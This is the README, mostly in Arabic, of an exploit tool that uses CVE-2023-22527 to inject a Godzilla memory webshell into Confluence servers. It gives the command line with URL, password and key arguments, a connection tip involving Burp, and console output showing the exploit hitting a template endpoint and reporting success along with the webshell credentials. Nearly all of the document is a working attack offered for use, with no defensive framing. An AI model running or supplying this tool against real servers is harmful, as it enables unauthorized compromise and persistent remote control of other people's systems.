
CVE-2023-22527 أداة حقن حصان الذاكرة
ملاحظة: الإصدار المختبر هو 8.5.1، الإصدارات الأخرى تعمل بالتأكيد ولكن لم يتم اختبارها.
المحتوى مرجع من أداة السيد Beichen السابقة.
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url 哥斯拉密码 哥斯拉密钥
example
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/ pass key
إذا تم حقن القشرة في الذاكرة بنجاح ولكن لا يمكن الاتصال بـ Godzilla، يرجى إضافة رأس البروتوكول التالي في تكوين الطلب أو تكوين وكيل Burp لـ Godzilla.
Connection: close
$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key
